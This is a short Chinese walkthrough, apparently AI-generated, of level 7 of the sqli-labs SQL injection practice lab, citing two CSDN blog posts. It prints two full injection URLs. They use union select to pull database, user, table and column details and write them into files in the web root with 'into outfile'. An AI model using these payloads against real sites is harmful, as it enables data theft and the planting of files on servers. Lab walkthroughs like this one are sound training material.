sqli-labs第七关
时间: 2023-12-26 14:41:36 浏览: 32
sqli-labs第七关是一个SQL注入的挑战。根据引用\[1\]中的提示,我们可以通过构造注入语句来获取数据库信息。首先,我们可以使用括号来判断注入点的类型,然后构造语句部分,例如`where id=(('$id'))`。接下来,我们可以使用`order by`语句来判断字段的个数。
根据引用\[2\],我们可以使用`union select`语句来获取数据库的版本信息、操作系统信息以及表的列名。具体的注入语句如下所示:
`http://sqli.com/Less-7/?id=1')) union select version(),@@version_compile_os,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users') into outfile 'E:\\site\\phpStudy_64\\phpstudy_pro\\WWW\\sqli\\Less-7\\2.txt' --+`
同样地,根据引用\[3\],我们可以使用`union select`语句来获取当前用户、数据库名称以及表的名称。具体的注入语句如下所示:
`http://sqli.com/Less-7/?id=1')) union select user(),database(),(select group_concat(table_name) from information_schema.tables where table_schema=database()) into outfile 'E:\\site\\phpStudy_64\\phpstudy_pro\\WWW\\sqli\\Less-7\\1.txt' --+`
通过这些注入语句,我们可以将获取到的数据库信息写入到指定的文件中。
#### 引用[.reference_title]
- *1* [sqli-labs第七关(详讲)](https://blog.csdn.net/qq_37370714/article/details/120237221)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item]
- *2* *3* [sqli-labs-----第7关](https://blog.csdn.net/wyzhxhn/article/details/127725829)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item]
[ .reference_list ]